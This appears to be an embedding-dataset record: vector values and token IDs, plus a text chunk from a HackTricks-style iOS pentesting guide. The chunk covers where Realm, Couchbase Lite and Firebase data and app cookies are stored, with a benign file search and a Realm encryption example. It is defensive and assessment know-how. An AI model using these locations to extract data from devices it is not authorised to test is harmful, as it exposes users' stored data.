0.8184201121330261, -0.6347341537475586, -0.7170549631118774, -0.4252839684486389, -0.2785050570964813, 0.12387888133525848, -0.32310089468955994, 0.27345168590545654, -0.15180936455726624, -0.4653148353099823, -0.02559591457247734, 0.2761416435241699, 0.8903336524963379, 0.4092123210430145, -0.4403586983680725, -0.1988341510295868, 0.48562243580818176, 0.5093439817428589, -0.45245546102523804, -0.002721452387049794, -0.15596555173397064, 0.5666460990905762, 0.6050085425376892, 1.0022509098052979, 0.4967826008796692, 0.0393095500767231, 0.12207648158073425, 0.18596382439136505, 0.09717277437448502, 0.12197781354188919, -0.2008657157421112, 0.4235104024410248, 0.10493337363004684, 0.21800503134727478, 0.733817458152771, 0.20565596222877502, 0.08326860517263412, -0.17138126492500305, 0.3306668996810913, 0.5503020882606506, -0.5762186646461487, 0.22678956389427185, 1.064042091369629, 0.09159374237060547, -1.1729888916015625, -0.49546268582344055, 1.0219045877456665, 0.42042943835258484, -0.5942312479019165, -0.7743851542472839, -0.011986948549747467, 0.3548595905303955, 0.18647614121437073, -0.04212943837046623, -0.10045985877513885, 0.6990379691123962, 0.15863224864006042, 0.28959035873413086, -0.3080506920814514, -0.27552297711372375, -0.2904805541038513, -0.2042260318994522, -0.6357833743095398, -0.35016217827796936, -0.7326582670211792, 0.1634083092212677, 0.5865476727485657, -0.9571660757064819, 0.5266803503036499, -0.3946511745452881, -0.8370641469955444, -0.2359565645456314, 0.25233474373817444, 0.7453038692474365, 0.3313501179218292, 0.07523051649332047, -1.2305846214294434, 0.4056679904460907, 0.19504116475582123, 0.4568779766559601, -0.05051784962415695, -0.09353070706129074, 0.21706147491931915, -0.4256003201007843, 0.28578704595565796, -1.1001076698303223, 1.0078436136245728, -0.5172598958015442, -0.7214493155479431, -0.3203771114349365, 0.2812173664569855, 0.37178874015808105, 0.20640961825847626, 0.6365222930908203, -0.7317247986793518, 1.0145341157913208, -0.05908692255616188, 0.36714160442352295, 0.5137501358985901, 0.3255583643913269, -0.30132216215133667, 0.23690631985664368, 0.2512439489364624, 0.6145298480987549, -0.6628372073173523, 0.04728470370173454, 0.47478044033050537, -0.013405405916273594, -0.06782658398151398, -0.23540270328521729, 0.09651065617799759, -0.6558256149291992, 0.012729013338685036, 0.3205574154853821, -0.11008337140083313, 0.27907735109329224, -0.2829686403274536, -0.9382973909378052, -0.1925565004348755, -0.40425682067871094, -0.5343942642211914, 0.03671618178486824, -0.25210514664649963, 0.7463549375534058, -0.50172358751297, -0.11496368795633316, 0.09764093905687332, -0.40274953842163086, 0.44771385192871094, 0.36031731963157654, -0.00912886206060648, -0.22979336977005005, 0.2686375379562378, -0.15441052615642548, -0.6024706959724426, 0.133350670337677, 0.3181428611278534, 0.17435677349567413, -0.2633001506328583, -0.29305437207221985, -0.42756545543670654, -0.4545244574546814, 0.3425622582435608, 0.481192022562027, 0.24478836357593536, 0.8764249682426453, -0.2020595818758011, 0.3226117789745331, 0.27902671694755554, -0.255532830953598, 1.113483190536499, -0.029042338952422142, 0.32319900393486023, 0.3594352900981903, -0.5957236886024475, -0.608732283115387, -0.041185617446899414, 0.16795527935028076, 0.3270292282104492, 0.5430272221565247, 1.0191012620925903, -0.405304491519928, 0.4030593931674957, 1.0644499063491821, -0.22270622849464417, -0.8462385535240173, 0.7507129907608032, 0.12197054177522659, 0.2899746000766754, -0.5379064679145813, 0.18097715079784393, 0.7407545447349548, 0.017462968826293945, 0.07300274074077606, 0.7378727197647095, -0.18227840960025787, -0.44565117359161377, -0.45267540216445923, 0.26645195484161377, -0.16787104308605194, 0.29423192143440247, 0.5930280089378357, -0.5000038743019104, -0.534331202507019, -1.1031628847122192, -0.6262266039848328, 0.583768367767334, 0.9812005758285522, 0.806395411491394, 0.10237381607294083, 0.9892303943634033, 0.6937305927276611, -0.19193783402442932, 0.6986809968948364, -0.5667305588722229, 0.13029924035072327, -0.3904724419116974, 0.4111456573009491, -0.1700376719236374, -0.08189210295677185, -0.3195277750492096, -0.2156495600938797, -0.5777103900909424, -0.3759114146232605, -0.4758246839046478, 0.05466977879405022, -0.6314333081245422, -0.5402423143386841, -0.5267261862754822, 0.701114296913147, -1.0348625183105469, -0.052410200238227844, -0.09727685898542404, 0.5182698965072632, 0.9350937604904175, -0.5243343114852905, -0.18125036358833313, -0.24126648902893066, 0.04397997260093689, 0.21231813728809357, -0.7189216613769531, -0.3929295241832733, -1.0151636600494385, -0.27954643964767456, -0.38139328360557556, -0.25959113240242004, 0.1756550818681717, -0.08756829053163528, 0.3114517629146576, -0.9178363680839539, -0.26826390624046326, 0.39651891589164734, -0.09321212023496628, -0.5512898564338684, -0.039903588593006134, 0.5894654393196106, 0.5697712302207947, 0.8122135996818542, -0.42379406094551086, 0.20213037729263306, -0.3527098596096039, -0.4450351297855377, 0.2365327924489975, -0.5722888708114624, 0.24654243886470795, 0.04441024735569954, 0.265969842672348, -0.06652557104825974, 0.24258609116077423, -0.7510737180709839, 0.5123319029808044, -0.035559363663196564, 0.3367941975593567, 0.0386374406516552, -0.45776814222335815, 0.9220522046089172, -0.13789990544319153, -0.040883347392082214, 0.4217086434364319, 1.0394443273544312, -0.18647603690624237, 0.20694325864315033, -0.356707900762558, -0.6393200755119324, 1.0489249229431152, -0.5375613570213318, 0.6758719682693481, -0.285748690366745, 0.20551946759223938, 0.08763398230075836, -0.2197205275297165, 0.853840172290802, -0.12948498129844666, 0.6083294153213501, -1.4961971044540405, -0.6756592988967896, 0.2592564821243286, 0.11546014994382858, -0.2639808654785156, 0.8229769468307495, -0.18343500792980194, -0.24954460561275482, -0.1353636234998703, 0.3520163595676422, -0.9112180471420288, -0.4247610867023468, -0.2694169580936432, -0.4131717383861542, -0.08953097462654114, -0.5538751482963562, 0.30765557289123535, -0.31243205070495605, -0.4006263315677643, 0.5937508940696716, -0.2574296295642853, 0.45540955662727356, -0.8203116655349731, -0.1262020617723465, -0.3673003911972046, 0.2146756798028946, 0.4501664936542511, 0.3189241588115692, -0.20236115157604218, 0.1950027346611023, 0.7107284665107727, 0.1075373962521553, 0.16150632500648499, -0.02471330761909485, -0.3832058012485504, 0.22759056091308594, 0.24800536036491394, 0.5856326222419739, -0.11052008718252182, 1.0340367555618286, 0.08949930965900421, -0.17980004847049713, -0.8887255787849426, -0.4967004954814911, -1.0713704824447632, -0.36417996883392334, 0.22356948256492615, -0.24323685467243195, 0.35991528630256653, -0.5368366837501526, -0.6028287410736084, -0.24957822263240814, 0.6204885840415955, 0.17298360168933868, -0.7341432571411133, 0.12025811523199081, 0.08054324984550476, 0.08546475321054459, -0.7288600206375122, -0.22794902324676514, -0.4194958209991455, -0.03836454823613167, -0.18650086224079132, 0.4832252860069275, -0.3737834393978119, 0.05990226939320564, 0.09549042582511902, -0.43725815415382385, 0.6149851083755493, 0.019786633551120758, -0.5286274552345276, -1.122209906578064, -0.16716687381267548, 0.12650789320468903, -0.40802258253097534, 0.33514249324798584, -0.4415163993835449, 0.303970068693161, -0.16718341410160065, -0.7530165314674377, 0.39695754647254944, -0.07319067418575287, -0.052450451999902725, 0.06971694529056549, 0.6330434083938599, -1.320244312286377, 0.15210844576358795, -0.3370739221572876, 0.43291324377059937, 0.38277190923690796, -0.4549078345298767, -0.38049784302711487, 0.5774121284484863, -0.368941068649292, -1.2845714092254639, -0.04628026485443115, -0.19245535135269165, 0.13314275443553925, 0.12990586459636688, -0.06235164403915405, 0.444290429353714, -0.09356855601072311, 0.6002519130706787, 0.7940793037414551, -0.002490431535989046, 0.10077505558729172, -0.2317327857017517, 0.2510506212711334, 0.6130937337875366, -0.49230730533599854, -0.05965384840965271, -0.6360446214675903, -0.24512799084186554, -0.07957201451063156, -0.6273597478866577, -0.15233102440834045, -0.7957003116607666, 0.04260189086198807, 0.28790563344955444, -0.4477158188819885, 0.03228670358657837, 0.045700158923864365, -0.597819983959198, -0.6154499650001526, 0.3982198238372803, -0.7319688200950623, 0.7363908290863037, 0.4470137357711792, 0.18220075964927673, -0.0025104752276092768, -0.3068191111087799, 0.5751274228096008, -0.15433791279792786, -0.3076913356781006, 0.7178158164024353, -0.22689871490001678, -0.29475846886634827, 0.8075786828994751, 0.6258794665336609, -0.8481557965278625, -0.38747265934944153, -0.18449872732162476, 0.06510446965694427, 0.0964362621307373, -0.6692509651184082, -0.1752503663301468, -0.033955249935388565, -0.6029211282730103, -0.17757810652256012, 0.34862834215164185, 0.31200894713401794, -0.07547757774591446, -0.5524024963378906, 0.8434571027755737, -0.13126824796199799, -0.5427913665771484, 0.5959379076957703, -0.815312922000885, -0.19829140603542328, -0.6299135684967041, 0.3252728283405304, 0.5957515239715576, 0.08701198548078537, 0.975869357585907, -0.12457720935344696, -0.3501852750778198, -0.3939836919307709, -0.005381906405091286, 0.8007971048355103, 0.09217780083417892, -0.04238060861825943, 1.1031417846679688, 0.6804165840148926, -0.598876953125, -0.4329105615615845, 0.019575200974941254, 0.29990607500076294, 0.16272611916065216, -0.5816797614097595, 0.29765477776527405, -0.011286809109151363, 0.3564472496509552, -0.4767112135887146, -0.7469053268432617, -0.5936170816421509, -0.6893249154090881, -0.40376153588294983, 0.11926242709159851, -0.510112464427948, -0.8626992702484131, 0.06519848108291626, 0.37554964423179626, -0.5632705092430115, -0.1252964586019516, 0.6504374742507935, -0.3098790943622589, 0.48820170760154724, -0.27699217200279236, 0.7238072156906128, -0.8877356052398682, -0.3548962473869324, -0.41816848516464233, -0.23733296990394592, -0.031624745577573776, -0.27192091941833496, -0.683413028717041, -0.1697751134634018, -0.3734765648841858, 0.047349534928798676, -0.17007745802402496, -0.3248761296272278, -0.5504246950149536, -0.3993317782878876, 0.5253620147705078, 0.5900959968566895, -0.3609224855899811, 0.010291924700140953, 0.43842989206314087, 0.2918212115764618, 0.14213970303535461, -0.6078760623931885, -0.2991856634616852, -0.11528109759092331, 0.5436407327651978, -0.22273863852024078, 0.47464680671691895, -0.2041172832250595, 0.06300682574510574, -0.03527296334505081, -0.35685473680496216, -0.34200581908226013, -0.7797567844390869, -0.405013769865036, 0.574272096157074, -0.45140311121940613, 0.3642289936542511, 0.4880228340625763, 0.03936702013015747, 0.3664540946483612, -0.7917852401733398, 0.15328475832939148, 0.2678709924221039, -0.17693069577217102, 0.32323721051216125, 0.08913687616586685, -0.11931071430444717, -0.6774755716323853, -0.20814529061317444, 0.02909848652780056, -0.601737916469574, 0.4169383645057678, -0.41990578174591064, -0.19191290438175201, -0.3619571626186371, -0.1893143504858017, 0.07419932633638382, 0.5220410227775574, 0.543607771396637, 0.03331587463617325, 0.5081529021263123, -0.1956941932439804, -0.6690020561218262, 0.14747613668441772, -0.8442102074623108, -0.07443201541900635, 0.5460691452026367, -0.06817811727523804, -0.557374119758606, -0.2742113471031189, -0.015618867240846157, 0.050704650580883026, 0.16977772116661072, 0.22476674616336823, 0.02723587490618229, 0.2651037871837616, 0.15170928835868835, 0.9069426655769348, -0.2270321249961853, -0.5725719928741455, 0.15208683907985687, 0.7158122658729553, -1.1308276653289795, -0.745999276638031, 0.5638152956962585, 0.6851661205291748, 0.41071733832359314, 0.35116392374038696, -0.28072863817214966, -0.41921183466911316, 0.7917255759239197, 0.30853646993637085, 0.9704974293708801, -0.3536030054092407, -0.5345442891120911, 0.5564059615135193, -0.31022292375564575, 0.4909539818763733, 0.24729423224925995, -0.2504916489124298, 0.22625784575939178, -0.737967312335968, -0.8451594114303589, 0.02239121124148369, 0.6841442584991455, -0.33138373494148254, 0.8444718718528748, 0.8660504817962646, 0.4245234429836273, -0.9315778613090515, -0.15107174217700958, -0.296351820230484, 0.3027297854423523, 0.5443189740180969, -0.17048662900924683, -0.23927901685237885, 0.5908913016319275, 0.35594138503074646, 0.27731937170028687, -0.05446075648069382, 0.6076736450195312, -0.01837136037647724, -0.07649305462837219, -0.1695067435503006, 0.07547102868556976, -0.08704271167516708, 0.4327501058578491, -0.23182308673858643, -0.16047462821006775, -0.024721316993236542, 0.2963724136352539, 0.1294350028038025, -0.27317294478416443, 0.6967951059341431, -0.821319043636322, 0.790302574634552, 0.16850689053535461, -0.04435349628329277, 0.1914115846157074, -0.15554451942443848, -0.5813978910446167, 0.3646993339061737, 0.9011023640632629, 0.6846001744270325, 0.7983967661857605, 0.6574574112892151, -0.028386808931827545, -0.05298231542110443, 0.14132775366306305, -0.3367236256599426, -0.9608966708183289, 0.6178004741668701, -0.4331049621105194, -1.1947818994522095, -0.5857731103897095, 0.29943498969078064, 0.26659703254699707, -0.2786579728126526, 0.2885807752609253, 0.28203439712524414, -0.1834341585636139, -0.6715995669364929, -0.05944691225886345, -0.49879658222198486, -0.0741272121667862, 0.2374299168586731, -0.6453843116760254, -0.6789305210113525, 1.0121190547943115, 0.10294662415981293, 0.6035169959068298, -0.30452027916908264, 0.3625808358192444, 0.18100307881832123, 0.6915983557701111, 0.5457472801208496, -0.39021536707878113, -0.4381351172924042, 0.003055154113098979, -0.174519345164299, -0.5903978943824768, -0.20336386561393738, -0.011634177528321743, 0.22439077496528625, 0.1891198307275772, 0.044028133153915405, -0.23712275922298431, -0.13533256947994232, -0.15824052691459656, -0.9821534752845764, 0.6388726234436035, 0.139012411236763, -0.03907187655568123, 0.3180854618549347, -0.06579954922199249, 0.0035808526445180178, 0.5248538851737976, -0.45664164423942566, -0.40054038166999817, -0.19647130370140076, 0.10276223719120026, -0.05553436279296875, 0.9413864612579346, -0.23007681965827942, -0.027977442368865013, 0.5959546566009521, -0.4995178282260895, -0.7134464979171753, -0.17206892371177673, -0.5523645877838135, -0.6730696558952332, 0.45126399397850037, 0.3729766011238098, 0.447115957736969, 0.12887944281101227, -0.9459649324417114, -0.6137942671775818, 0.7044224143028259, 0.19496162235736847, -0.6772195100784302, 1.0021982192993164, 0.5064699053764343, 0.1512058824300766, 0.15256312489509583, -0.2215214967727661, 0.7977262139320374, -0.09077367931604385, -0.33249014616012573, -0.32873058319091797, -0.5509702563285828, -0.7530673742294312, -0.2565668225288391, 0.10599252581596375, -0.2111133635044098, -0.371474027633667, 0.2305201292037964, -0.357172429561615, -0.22233805060386658, -0.3898247480392456, 0.8052286505699158, -0.09316559880971909, 0.28425681591033936, 0.4635690748691559, -0.31156790256500244, 0.8799281716346741, -1.2470512390136719, 4.371253490447998, 0.45068007707595825, 0.34197819232940674, 0.10404042154550552, 0.038539234548807144, 0.7247856259346008, 1.1055723428726196, -0.21661290526390076, 0.3757338523864746, -0.3476107716560364, 0.13447527587413788, -0.5797444581985474, 0.13788214325904846, 0.09957581758499146, -0.22808396816253662, 0.5933812856674194, -0.34896519780158997, 0.32854536175727844, 0.2554070055484772, -0.9557000994682312, -0.8890350461006165, 0.20881421864032745, -0.3701631724834442, 1.1259840726852417, 0.2139451801776886, -0.07313429564237595, 0.40243813395500183, -0.2078792303800583, -0.7405855059623718, 0.33252328634262085, 0.04968911409378052, -0.42652609944343567, -0.20194123685359955, -0.1136505976319313, -0.42226502299308777, 0.4306313097476959, 0.359472393989563, -0.968056321144104, -0.4992692768573761, 0.08637498319149017, -0.3860650658607483, -0.22525854408740997, -0.013477464206516743, -0.1254303902387619, -0.1323707401752472, 0.5897048711776733, -0.8463166952133179, 0.2615990936756134, 0.37540221214294434, -0.312362402677536, 0.4395182728767395, 0.02932056598365307, 0.37814944982528687, -0.011826017871499062, -0.5551459193229675, -0.101796954870224, -0.08058033138513565, -0.09587094187736511, 0.12902064621448517, -0.4014354944229126, 1.1335140466690063, -1.0199106931686401, -0.01594899408519268, 0.3608289361000061, -0.6179701089859009, 0.23213721811771393, -0.5466403365135193, 1.2506933212280273, -0.026929911226034164, -0.34145161509513855, -0.51389479637146, -0.2534900903701782, -0.6727654337882996, -0.5421927571296692, 0.78819340467453, -0.6283422708511353, -0.35577037930488586, 0.12887565791606903, 0.2836868464946747, -0.5456895232200623, -0.15844006836414337, -0.545087993144989, -0.6567019820213318, 0.16925056278705597, 0.9331986904144287, 0.6947227716445923, -0.4036901891231537, -0.44402700662612915, 0.8113274574279785, 0.17822101712226868, 0.15476936101913452, 0.8815032839775085, -0.25091928243637085, -0.0336407795548439, 0.44358956813812256 ]
[ 17465, 1011, 1039, 2692, 14142, 2487, 7875, 2581, 2063, 26976, 2094, 1013, 3075, 1013, 18394, 1013, 4012, 1012, 2070, 1012, 7427, 1012, 10439, 1012, 20228, 2923, 17345, 2951, 17345, 2951, 2003, 1037, 7705, 2005, 6605, 1996, 2944, 6741, 1997, 5200, 1999, 2115, 4646, 1012, 4563, 2951, 2064, 2224, 29296, 4221, 2004, 2049, 14516, 3573, 1010, 2021, 1996, 7705, 2993, 2003, 2025, 1037, 7809, 1012, 4563, 2850, 2696, 2515, 2025, 4372, 26775, 22571, 2102, 2009, 1005, 1055, 2951, 2011, 12398, 1012, 2174, 1010, 2019, 3176, 21999, 6741, 2064, 2022, 2794, 2000, 4563, 2850, 2696, 1012, 2156, 1996, 21025, 2705, 12083, 16360, 2080, 2005, 2062, 4751, 1012, 2017, 2064, 2424, 1996, 29296, 4221, 4563, 2951, 2592, 1997, 2019, 4646, 1999, 1996, 4130, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1063, 10439, 3593, 1065, 1013, 3075, 1013, 4646, 2490, 10128, 2017, 2064, 2330, 1996, 29296, 4221, 1998, 3229, 7591, 2592, 1010, 2059, 2017, 2179, 1037, 3335, 1011, 9563, 1012, 3642, 2013, 1045, 3995, 4017, 1011, 1006, 11675, 1007, 8250, 12928, 12146, 1063, 10439, 9247, 29107, 2618, 1008, 10439, 9247, 29107, 2618, 1027, 1006, 10439, 9247, 29107, 2618, 1008, 1007, 1006, 21318, 29098, 19341, 3508, 1012, 4207, 29098, 19341, 3508, 1012, 11849, 1007, 1025, 24978, 24805, 5999, 16429, 20614, 8663, 18209, 1008, 6123, 1027, 1031, 10439, 9247, 29107, 2618, 3266, 16429, 20614, 8663, 18209, 1033, 1025, 5310, 1008, 5310, 1027, 1031, 2969, 18584, 20330, 1033, 1025, 2065, 1006, 5310, 1007, 1063, 2709, 1025, 1065, 5310, 1027, 1031, 24978, 4765, 3012, 6155, 23235, 3258, 19274, 2638, 12155, 2497, 20614, 29278, 4765, 3012, 29278, 18442, 1024, 1030, 1000, 5310, 1000, 1999, 24805, 5999, 16429, 20614, 8663, 18209, 1024, 6123, 1033, 1025, 5310, 1012, 10373, 1027, 4563, 2850, 2696, 14545, 4014, 1025, 5310, 1012, 20786, 1027, 4563, 2850, 2696, 15194, 18351, 1025, 24978, 2121, 29165, 1008, 7561, 1025, 2065, 1006, 999, 1031, 6123, 3828, 1024, 1004, 7561, 1033, 1007, 1063, 24978, 21197, 1006, 1030, 1000, 7561, 1999, 7494, 2951, 1024, 1003, 1030, 1000, 1010, 1031, 7561, 22574, 6155, 23235, 3258, 1033, 1007, 1025, 1065, 2842, 1063, 24978, 21197, 1006, 1030, 1000, 2951, 8250, 1999, 4563, 2951, 1000, 1007, 1025, 1065, 1065, 8038, 17299, 6790, 15058, 3148, 17299, 6790, 15058, 2003, 1037, 3145, 1013, 3643, 3573, 2328, 2006, 2327, 1997, 29296, 4221, 1012, 2004, 1996, 8038, 2361, 17881, 2024, 29296, 4221, 17881, 2017, 2064, 2424, 2068, 2478, 1996, 3800, 2094, 4012, 3549, 2094, 1999, 1996, 3025, 2930, 1012, 2060, 29296, 4221, 17881, 4183, 1005, 1055, 2691, 2005, 5097, 2000, 3443, 2037, 2219, 29296, 4221, 7809, 1012, 2027, 2089, 2022, 23977, 7591, 2951, 2006, 2068, 1998, 2975, 2009, 16655, 12273, 2854, 13876, 2098, 1012, 3568, 1010, 2009, 1005, 1055, 2467, 5875, 2000, 4638, 2296, 7809, 2503, 1996, 5097, 14176, 1012, 3568, 2175, 2000, 1996, 4646, 14176, 2073, 1996, 2951, 2003, 5552, 1006, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1063, 10439, 3593, 1065, 1007, 2424, 1012, 1013, 1011, 2171, 1000, 1008, 1012, 29296, 4221, 1000, 1011, 2030, 1011, 2171, 1000, 1008, 1012, 16962, 1000, 2543, 15058, 2613, 1011, 2051 ]
hack_tricks
43.txt
9
databasesit can be leveraged by application developers to store and sync data with a nosql cloud - hosted database. the data is stored as json and is synchronized in real - time to every connected client and also remains available even when the application goes offline. you can find how to check for misconfigured firebase databases here : firebase databaserealm databasesrealm objective - c and realm swift aren't supplied by apple, but they are still worth noting. they store everything unencrypted, unless the configuration has encryption enabled. you can find this databases in / private / var / mobile / containers / data / application / { appid } iphone : / private / var / mobile / containers / data / application / a079df84 - 726c - 4aea - a194 - 805b97b3684a / documents root # lsdefault. realm default. realm. lock default. realm. management / default. realm. note | $ find. / - name " *. realm * " you can use the tool realm studio to open this database files. the following example demonstrates how to use encryption with a realm database : / / open the encrypted realm file where getkey ( ) is a method to obtain a key from the keychain or a serverlet config = realm. configuration ( encryptionkey : getkey ( ) ) do { let realm = try realm ( configuration : config ) / / use the realm as normal } catch let error as nserror { / / if the encryption key is wrong, ` error ` will say that it's an invalid database fatalerror ( " error opening realm : \ ( error ) " ) } couchbase lite databasescouchbase lite is a lightweight, embedded, document - oriented ( nosql ) database engine that can be synced. it compiles natively for ios and macos. check for possible couchbase databases in / private / var / mobile / containers / data / application / { appid } / library / application support / cookiesios store the cookies of the apps in the library / cookies / cookies. binarycookies inside each apps folder. however, developers sometimes decide to save them in the keychain as the mentioned cookie file can be accessed in backups. to inspect the cookies file you can use this python script or use objection's ios cookies get. you can also use objection to convert
[ 0.07352572679519653, -0.5758460760116577, -0.22994670271873474, 0.3886609971523285, 0.24077032506465912, 0.24209900200366974, -0.4355532228946686, 0.4823867678642273, 0.7102764844894409, 0.9799891114234924, 0.01173537690192461, -0.15993991494178772, 0.5191525220870972, -0.6033284068107605, -0.13054083287715912, -0.3913723826408386, -0.6838685274124146, -0.021130116656422615, -1.2439062595367432, -0.25805193185806274, 0.03838014230132103, 0.22969847917556763, -0.8316575288772583, -0.8506827354431152, -0.4138742685317993, 0.9668646454811096, 0.5791057348251343, 0.47708478569984436, 0.6282904148101807, 1.0029798746109009, 0.31290340423583984, -0.1465529203414917, 0.15968728065490723, -0.5575296878814697, 0.013233297504484653, 0.5084164142608643, 0.4587579071521759, -0.11497917771339417, 0.07923497259616852, -0.6092040538787842, 0.44829922914505005, -0.2256447970867157, 0.3720800280570984, -0.684221088886261, -0.5472946763038635, -0.36928924918174744, 0.0960172638297081, -0.2340351641178131, 0.4750136733055115, -0.1321658194065094, 0.3906165659427643, 0.23475556075572968, -0.09885939210653305, 0.3257336914539337, 0.7154484391212463, 0.01127182599157095, 0.32892608642578125, 0.5051100850105286, -0.3867228627204895, 0.49307960271835327, 0.20988228917121887, 0.2130604237318039, -0.0975167527794838, -0.9900069236755371, 0.11952442675828934, 0.10924484580755234, -0.18651971220970154, -0.5668652057647705, -0.10875246673822403, -0.610994815826416, -0.16295276582241058, 0.42037442326545715, -0.7318228483200073, -0.5724382400512695, -0.08866879343986511, 0.23151646554470062, 0.32447299361228943, -0.6994903087615967, -0.24132324755191803, 0.18247805535793304, 0.20697294175624847, 0.3553730845451355, 0.3489622473716736, -0.031278058886528015, -0.4659404754638672, -0.10443688929080963, 0.4546017050743103, 0.38454878330230713, -0.3343624472618103, -0.15698055922985077, 0.3487192392349243, 0.5583410263061523, 0.07548709213733673, 0.18855899572372437, 0.33010274171829224, 0.6517012119293213, 0.08972112089395523, -0.0763663500547409, 0.46755921840667725, -0.37330201268196106, 0.3392605185508728, 0.7506700158119202, 0.21132370829582214, 0.6184263825416565, -0.26527851819992065, 0.7740268707275391, -0.008066144771873951, 0.646125078201294, -0.17073415219783783, -0.15466496348381042, 0.05593165010213852, -0.25812646746635437, 0.5019145011901855, -0.42311397194862366, 0.08617714792490005, 0.8844478130340576, -0.02724996581673622, 0.3886088728904724, -0.4127051532268524, 0.206954225897789, 0.08766449987888336, -0.18075381219387054, 0.18723100423812866, -0.5226163268089294, 0.4672248065471649, -0.24280455708503723, 0.5692619681358337, 0.42379555106163025, -0.7007051110267639, -0.512266993522644, -0.1876680999994278, -0.7962954640388489, -0.06053667888045311, 0.5186319947242737, -0.7443302869796753, 0.04460936784744263, 0.23813839256763458, 0.6702227592468262, 0.2746184766292572, -0.7093435525894165, -0.07232558727264404, 0.15200866758823395, 0.1399846076965332, 1.0082956552505493, 0.1360093504190445, -0.18995682895183563, -0.39736035466194153, -0.40820980072021484, -0.4898393452167511, 0.6517402529716492, -0.17921197414398193, -0.08106184750795364, 0.7022642493247986, 0.14633074402809143, -0.6057496070861816, -0.39704200625419617, -0.6866063475608826, 0.5314134359359741, 0.24676042795181274, -0.42608022689819336, 0.015869105234742165, 0.7917693853378296, -0.0825456976890564, 0.13119518756866455, -0.40001001954078674, 0.5199301838874817, -0.39766961336135864, -0.4504878520965576, -0.37468278408050537, 0.4087565839290619, -0.002490689978003502, -0.03271135687828064, -0.4736925959587097, 0.4428536891937256, 1.3449634313583374, 0.6413626670837402, -0.13948215544223785, -0.13372722268104553, 0.4739910960197449, 0.6212660074234009, -0.19332639873027802, 0.576647937297821, 0.2621610462665558, 0.6759793758392334, 0.27106669545173645, 0.20947039127349854, -0.3638729155063629, -1.0131499767303467, -0.0161331407725811, -0.025106655433773994, -0.5815450549125671, 0.7320014834403992, -0.5946213603019714, 0.31968826055526733, 0.5698912143707275, -0.300404816865921, -0.7719523906707764, -0.39398500323295593, -0.11007902771234512, -1.690577507019043, -0.4911726117134094, -0.24320460855960846, -0.05934923514723778, 0.8448004126548767, -0.48253947496414185, -0.022453589364886284, 0.5259739756584167, 0.6660970449447632, -0.9158461689949036, 0.8816802501678467, 0.8399443030357361, -0.1584145724773407, -0.4646078050136566, -0.34192219376564026, -0.1797425001859665, -0.07699182629585266, -0.8009666800498962, 0.10818615555763245, -0.22449301183223724, -0.14748874306678772, -0.055745117366313934, 0.2363448441028595, 1.0721325874328613, 0.14935602247714996, -0.42586687207221985, 0.34464943408966064, 0.1616012305021286, 0.2358919233083725, -0.6124952435493469, -0.18508067727088928, -0.06338150054216385, 0.819344162940979, 0.31436479091644287, 0.753001868724823, 0.30280444025993347, -0.25946667790412903, 0.010892285965383053, 0.20194809138774872, -0.08603110164403915, 0.2823055386543274, -0.12958639860153198, 0.6591147780418396, 0.059486981481313705, -0.0012713272590190172, 0.017667924985289574, -0.03622876852750778, 0.031946297734975815, 0.14814108610153198, -0.32298555970191956, 0.8897778987884521, -0.4400847852230072, 0.39106830954551697, 1.0122212171554565, -0.06354716420173645, -0.8846386075019836, -0.57335364818573, 0.4745980203151703, 0.8977416157722473, -0.523454487323761, -0.7653784155845642, 0.005875741131603718, 0.1584135890007019, -0.26185792684555054, -0.1799398958683014, 0.38714686036109924, 0.2466418594121933, -0.026556795462965965, 0.6583480834960938, 0.041885219514369965, -0.5226343870162964, -0.5995460748672485, -0.5891200304031372, -0.9073609113693237, -0.35104355216026306, -0.5949288010597229, 0.10167212784290314, -0.00961251836270094, -0.4576391279697418, 0.31121692061424255, -0.22904914617538452, -0.5313897728919983, 0.40679121017456055, 0.024572890251874924, 0.47290411591529846, 0.06602473556995392, -0.173400416970253, -0.781347930431366, 0.4167376458644867, -0.027764905244112015, 0.32805290818214417, 0.14611482620239258, 0.260240375995636, 0.017568523064255714, 0.03561542555689812, 0.24258548021316528, -0.7256805896759033, 0.8799288272857666, 0.2669776678085327, -0.22327211499214172, -0.41478800773620605, -0.17230141162872314, 0.06800347566604614, 0.2634042501449585, 0.3368581533432007, -0.5385582447052002, 0.9558113217353821, -0.21712684631347656, 0.12556014955043793, 0.3947699964046478, 0.3258917033672333, -0.1603410691022873, 0.2002643495798111, -0.04296807944774628, 0.5687006711959839, -0.3542455732822418, 0.450716495513916, 0.2474944293498993, 0.1652558594942093, 0.1799105852842331, -0.22533205151557922, 0.46621599793434143, -0.4280490577220917, -0.11907441914081573, -0.46125051379203796, -0.3973301351070404, 0.752932071685791, 0.008546402677893639, -0.9901416301727295, 0.09009791165590286, -0.18021933734416962, -0.3128814101219177, 0.09927631914615631, -0.3102274537086487, 0.589303731918335, -0.4219309389591217, 0.5276957750320435, 0.4211896061897278, -0.5850418210029602, 0.3841578960418701, 0.4968692362308502, 0.03216363117098808, -0.3506278097629547, 0.18403486907482147, -0.11798235774040222, -0.24801519513130188, 0.6617740988731384, 0.1638922393321991, -0.3250403106212616, -0.12728409469127655, 0.11297360807657242, -0.6405752301216125, 0.04825890064239502, 0.0962928980588913, 0.304035484790802, 0.2489500641822815, 0.8612254858016968, -0.10333368182182312, 0.08128291368484497, 0.16219139099121094, -0.0563046969473362, 0.3226900100708008, -0.04101235046982765, 0.006879264488816261, 0.06862860172986984, -0.7737352252006531, -0.27965712547302246, -0.24060235917568207, 0.034626252949237823, 0.4568432569503784, -0.18418477475643158, 0.9005311727523804, 0.02915976569056511, -0.4447571039199829, 0.6925024390220642, -0.3429013788700104, -0.7506985068321228, 0.9935285449028015, 0.11431672424077988, 0.438297837972641, -0.6246364116668701, 0.14077836275100708, 0.5249388813972473, 0.04985193908214569, 0.2841031849384308, 0.3783486485481262, -0.04189709946513176, -0.4261990487575531, -0.5340564250946045, -0.03740658238530159, -0.4082878530025482, 0.04367120936512947, 0.45920971035957336, -0.5027232766151428, -0.523894727230072, -0.4413568377494812, -0.553655743598938, 0.3700708746910095, 1.1283414363861084, 0.4133131206035614, 0.00020705137285403907, 0.7115617394447327, 0.17664380371570587, -0.3307889401912689, 0.6572710871696472, -0.516507625579834, 0.17757026851177216, -0.3368452489376068, 0.2054244726896286, 0.2500951588153839, 0.0919426754117012, -0.35960400104522705, -0.18675076961517334, -0.4833959937095642, -0.5093507170677185, -0.153102308511734, -0.03578627109527588, -0.8355427980422974, -0.5136107802391052, 